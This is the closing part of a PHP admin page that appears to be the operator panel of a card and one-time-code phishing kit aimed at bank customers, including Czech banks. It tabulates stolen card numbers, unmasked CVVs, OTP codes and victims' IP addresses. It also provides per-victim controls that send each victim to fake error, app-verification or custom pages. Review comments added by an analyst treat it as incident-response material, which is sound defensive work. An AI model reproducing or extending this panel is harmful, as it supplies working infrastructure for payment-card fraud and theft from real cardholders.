                                    <p><strong>OTP Status:</strong> 
                                        <span class="badge badge-<?php echo ($card['status'] === 'otp_submitted') ? 'info' : 'warning'; ?>">
                                            <?php echo ($card['status'] === 'otp_submitted') ? 'OTP Submitted' : 'Waiting for OTP'; ?>
                                        </span>
                                    </p>
                                    <?php if ($card['status'] === 'otp_submitted'): /* the one-time code and its time are shown only once the entry reaches 'otp_submitted' */ ?>
                                    <p><strong>OTP Code:</strong> <span class="badge badge-success"><?php echo htmlspecialchars($card['otp']); /* printed as stored; no masking is applied in this view */ ?></span></p>
                                    <p><strong>OTP Time:</strong> <?php echo htmlspecialchars($card['otp_time']); ?></p>
                                    <?php endif; ?>
                                    <p><strong>Time:</strong> <?php echo htmlspecialchars($card['timestamp']); ?></p>
                                </div>
                                
                                <div class="card-redirect">
                                    <h3>Redirection Options</h3>
                                    <form method="post" action="">
                                        <div class="form-group">
                                            <label>Choose where to redirect the user:</label>
                                            <div class="radio-options">
                                                <div class="radio-option">
                                                    <input type="radio" id="redirect_success_<?php echo $session_id; ?>" name="redirect_choice" value="success" checked>
                                                    <label for="redirect_success_<?php echo $session_id; ?>">Success Page</label>
                                                </div>
                                                <div class="radio-option">
                                                    <input type="radio" id="redirect_error_<?php echo $session_id; ?>" name="redirect_choice" value="error">
                                                    <label for="redirect_error_<?php echo $session_id; ?>">OTP Error Page</label>
                                                </div>
                                                <div class="radio-option">
                                                    <input type="radio" id="redirect_app_<?php echo $session_id; ?>" name="redirect_choice" value="app">
                                                    <label for="redirect_app_<?php echo $session_id; ?>">App Verification</label>
                                                </div>
                                                <div class="radio-option">
                                                    <input type="radio" id="redirect_custom_<?php echo $session_id; ?>" name="redirect_choice" value="custom">
                                                    <label for="redirect_custom_<?php echo $session_id; ?>">Custom URL</label>
                                                </div>
                                            </div>
                                        </div>
                                        
                                        <div class="form-group" id="custom_url_group_<?php echo $session_id; ?>">
                                            <label for="custom_url_<?php echo $session_id; ?>">Custom URL:</label>
                                            <input type="url" id="custom_url_<?php echo $session_id; ?>" name="custom_url" value="http://google.com">
                                        </div>
                                        
                                        <div class="form-group" id="error_options_<?php echo $session_id; ?>" style="display: none;">
                                            <label for="error_type_<?php echo $session_id; ?>">Error Type:</label>
                                            <select id="error_type_<?php echo $session_id; ?>" name="error_type">
                                                <option value="timeout">Timeout</option>
                                                <option value="invalid">Invalid Code</option>
                                                <option value="blocked">Account Blocked</option>
                                                <option value="network">Network Error</option>
                                                <option value="technical">Technical Error</option>
                                                <option value="session">Session Expired</option>
                                            </select>
                                            <div class="form-group">
                                                <label for="error_attempts_<?php echo $session_id; ?>">Error Attempts:</label>
                                                <select id="error_attempts_<?php echo $session_id; ?>" name="error_attempts">
                                                    <option value="1">1</option>
                                                    <option value="2">2</option>
                                                    <option value="3">3</option>
                                                </select>
                                            </div>
                                        </div>
                                        
                                        <input type="hidden" name="session_id" value="<?php echo htmlspecialchars($session_id); /* this form posts back to the same script with action=handle_otp_redirect plus redirect_choice, custom_url, error_type, error_attempts and otp_decision; the handler is outside this view */ ?>">
                                        <input type="hidden" name="action" value="handle_otp_redirect">
                                        
                                        <div class="card-actions">
                                            <button type="submit" name="otp_decision" value="redirect" class="btn-success">Redirect User</button>
                                            <button type="submit" name="otp_decision" value="deny" class="btn-danger">Deny (Failure Page)</button>
                                        </div>
                                    </form>
                                </div>
                            </div>
                        </div>
                        <?php endif; ?>
                        <?php endforeach; /* NOTE(review): a per-entry listing of card number, expiry, CVV and one-time code next to a form that steers that visitor's next page is consistent with the operator console of a card/OTP collection kit - confirm against the rest of the file. The literal field names used above (handle_otp_redirect, redirect_choice, otp_decision) are fixed strings in this page and can serve as content indicators when searching for other copies. */ ?>
                    </div>
                    <?php endif; ?>
                </div>
				<!-- Recent Cards Tab -->
                <div class="tab-content" id="recent-tab">
                    <h2>Recent Card Submissions</h2>
                    
                    <?php if (empty($recent_cards)): /* $recent_cards is populated outside this view; its source (file, database) cannot be seen from here */ ?>
                    <p>No recent card submissions found.</p>
                    <?php else: ?>
                    <table>
                        <thead>
                            <tr>
                                <th>Date/Time</th>
                                <th>Card Number</th>
                                <th>Expiry</th>
                                <th>CVV</th>
                                <th>Save Card</th>
                                <th>Type</th>
                                <th>Bank</th>
                                <th>IP Address</th>
                            </tr>
                        </thead>
                        <tbody>
                            <?php foreach ($recent_cards as $card): /* one table row per stored submission; every field falls back to 'N/A' when the key is missing */ ?>
                            <tr>
                                <td><?php echo isset($card['timestamp']) ? htmlspecialchars($card['timestamp']) : 'N/A'; ?></td>
                                <td><?php echo isset($card['card_number']) ? htmlspecialchars(maskCardNumber($card['card_number'])) : 'N/A'; /* only this column goes through maskCardNumber(), which is defined outside this view */ ?></td>
                                <td><?php echo isset($card['expiry_date']) ? htmlspecialchars($card['expiry_date']) : 'N/A'; ?></td>
                                <td><?php echo isset($card['cvv']) ? htmlspecialchars($card['cvv']) : 'N/A'; /* printed as stored; no masking is applied in this view */ ?></td>
                                <td><?php echo isset($card['save_card']) ? htmlspecialchars($card['save_card']) : 'N/A'; ?></td>
                                <td><?php echo isset($card['card_type']) ? htmlspecialchars($card['card_type']) : 'N/A'; ?></td>
                                <td><?php echo isset($card['bank_name']) ? htmlspecialchars($card['bank_name']) : 'N/A'; ?></td>
                                <td><?php echo isset($card['ip']) ? htmlspecialchars($card['ip']) : 'N/A'; ?></td>
                            </tr>
                            <?php endforeach; /* NOTE(review): whatever store backs $recent_cards holds card number, expiry and CVV together with the submitter's IP; during incident response treat that store as cardholder data - its location must be confirmed from the loading code, which is not shown here */ ?>
                        </tbody>
                    </table>
                    <?php endif; ?>
                </div>
                
                <!-- Settings Tab -->
                <div class="tab-content" id="settings-tab">
                    <h2>Redirect Settings</h2>
                    
                    <?php if (isset($save_message)): /* one-shot confirmation text; the top of the file copies it out of $_SESSION['save_message'] and unsets it */ ?>
                    <div class="alert alert-success">
                        <?php echo $save_message; /* echoed as stored, without htmlspecialchars() */ ?>
                    </div>
                    <?php endif; /* The form below posts back to the same script with action=save_settings and the fields success_url, failure_url, default_destination, redirect_delay and enable_otp; each input is pre-filled from $settings. The code that loads and saves $settings is outside this view. NOTE(review): the URLs configured here are the pages visitors are sent on to, so saved values are useful pivots when mapping related infrastructure. */ ?>
                    
                    <form method="post" action="">
                        <div class="form-group">
                            <label for="success_url">Success Redirect URL</label>
                            <input type="text" id="success_url" name="success_url" value="<?php echo htmlspecialchars($settings['success_url']); ?>" required>
                            <small>Where to redirect users after successful verification</small>
                        </div>
                        
                        <div class="form-group">
                            <label for="failure_url">Failure Redirect URL</label>
                            <input type="text" id="failure_url" name="failure_url" value="<?php echo htmlspecialchars($settings['failure_url']); ?>" required>
                            <small>Where to redirect users after failed verification</small>
                        </div>
                        
                        <div class="form-group">
                            <label for="default_destination">Default Destination URL</label>
                            <input type="url" id="default_destination" name="default_destination" value="<?php echo htmlspecialchars($settings['default_destination']); ?>" required>
                            <small>Fallback URL if no specific redirect is defined</small>
                        </div>
                        
                        <div class="form-group">
                            <label for="redirect_delay">Redirect Delay (seconds)</label>
                            <input type="number" id="redirect_delay" name="redirect_delay" value="<?php echo (int)$settings['redirect_delay']; ?>" min="0" max="10" required>
                            <small>How long to wait before redirecting users (0-10 seconds)</small>
                        </div>
                        
                        <div class="form-group">
                            <label for="enable_otp">
                                <input type="checkbox" id="enable_otp" name="enable_otp" <?php echo isset($settings['enable_otp']) && $settings['enable_otp'] ? 'checked' : ''; ?>>
                                Enable OTP Verification
                            </label>
                            <small>Require OTP verification for Czech banks</small>
                        </div>
                        
                        <input type="hidden" name="action" value="save_settings">
                        <button type="submit">Save Settings</button>
                    </form>
                </div>
            </div>
        </div>
        <?php endif; ?>
    </div>
    
    <script>
        // Client-side wiring for the admin page, run once the DOM is ready:
        // tab switching (persisted in the ?tab= query parameter), the two refresh
        // buttons, a 30-second auto-reload while the pending or OTP tab is showing,
        // and the show/hide logic for the per-session redirect options.
        // NOTE(review): the getElementById() results for the tab panes and the two
        // refresh buttons are used without a null check. If one of those elements
        // is absent the handler throws at that statement and everything after it
        // is never wired up, so the statement order below is significant.
        document.addEventListener('DOMContentLoaded', function() {
            // Tab navigation
            const tabs = document.querySelectorAll('.tab');
            
            // Tab persistence: the tab name comes from the page URL (?tab=...) and is
            // interpolated into a CSS selector and an element id below.
            const currentTab = new URLSearchParams(window.location.search).get('tab');
            if (currentTab) {
                // Find the tab element with the corresponding data-tab attribute
                const tabElement = document.querySelector(`.tab[data-tab="${currentTab}"]`);
                if (tabElement) {
                    // Remove active class from all tabs
                    document.querySelectorAll('.tab').forEach(t => t.classList.remove('active'));
                    
                    // Add active class to the selected tab
                    tabElement.classList.add('active');
                    
                    // Hide all tab content
                    document.querySelectorAll('.tab-content').forEach(content => {
                        content.classList.remove('active');
                    });
                    
                    // Show the relevant tab content
                    document.getElementById(`${currentTab}-tab`).classList.add('active');
                }
            }
            
            tabs.forEach(tab => {
                tab.addEventListener('click', function() {
                    // Remove active class from all tabs
                    tabs.forEach(t => t.classList.remove('active'));
                    
                    // Add active class to clicked tab
                    this.classList.add('active');
                    
                    // Get the tab content id
                    const tabName = this.dataset.tab;
                    
                    // Hide all tab content
                    document.querySelectorAll('.tab-content').forEach(content => {
                        content.classList.remove('active');
                    });
                    
                    // Show the relevant tab content
                    document.getElementById(`${tabName}-tab`).classList.add('active');
                    
                    // Update URL without refreshing page, so the automatic reload
                    // further down comes back to the same tab
                    const url = new URL(window.location);
                    url.searchParams.set('tab', tabName);
                    window.history.pushState({}, '', url);
                });
            });
            
            // Function to set redirect URL in form field.
            // Exposed on window because the markup calls it from an inline onclick
            // attribute; it only fills the input, the form is still submitted by hand.
            window.setRedirectUrl = function(sessionId, url) {
                const redirectUrlField = document.getElementById(`redirect_url_${sessionId}`);
                if (redirectUrlField) {
                    redirectUrlField.value = url;
                }
            };
            
            // Refresh pending cards list (the button itself is defined outside this view)
            document.getElementById('refreshPendingBtn').addEventListener('click', function() {
                location.reload();
            });
            
            // Refresh OTP list
            document.getElementById('refreshOtpBtn').addEventListener('click', function() {
                location.reload();
            });
            
            // Auto-refresh pending cards list every 30 seconds.
            // The page is reloaded in full, so the lists are re-rendered server-side.
            // NOTE(review): an open panel therefore requests this script at a steady
            // 30-second interval, which can stand out as a regular pattern in the
            // web server's access log.
            setInterval(function() {
                if (document.getElementById('pending-tab').classList.contains('active') || 
                    document.getElementById('otp-tab').classList.contains('active')) {
                    location.reload();
                }
            }, 30000);
            
            // Add event listeners for the custom URL and error options toggles
            const pendingCards = document.querySelectorAll('.card-details');
            
            pendingCards.forEach(card => {
                // The hidden session_id input supplies the suffix used in the element ids
                const sessionIdInput = card.querySelector('input[name="session_id"]');
                if (!sessionIdInput) return;
                
                const sessionId = sessionIdInput.value;
                const redirectChoices = card.querySelectorAll('input[name="redirect_choice"]');
                
                if (redirectChoices.length > 0) {
                    const customUrlGroup = document.getElementById(`custom_url_group_${sessionId}`);
                    const errorOptions = document.getElementById(`error_options_${sessionId}`);
                    
                    if (customUrlGroup && errorOptions) {
                        redirectChoices.forEach(choice => {
                            choice.addEventListener('change', function() {
                                // Only the error options are actually toggled: the two
                                // statements that would hide the custom URL group are
                                // commented out, so this code never hides that field.
                                if (this.value === 'custom') {
                                    customUrlGroup.style.display = 'block';
                                    errorOptions.style.display = 'none';
                                } else if (this.value === 'error') {
                                    //customUrlGroup.style.display = 'none';
                                    errorOptions.style.display = 'block';
                                } else {
                                    //customUrlGroup.style.display = 'none';
                                    errorOptions.style.display = 'none';
                                }
                            });
                        });
                    }
                }
            });
        });
    </script>
</body>
</html>
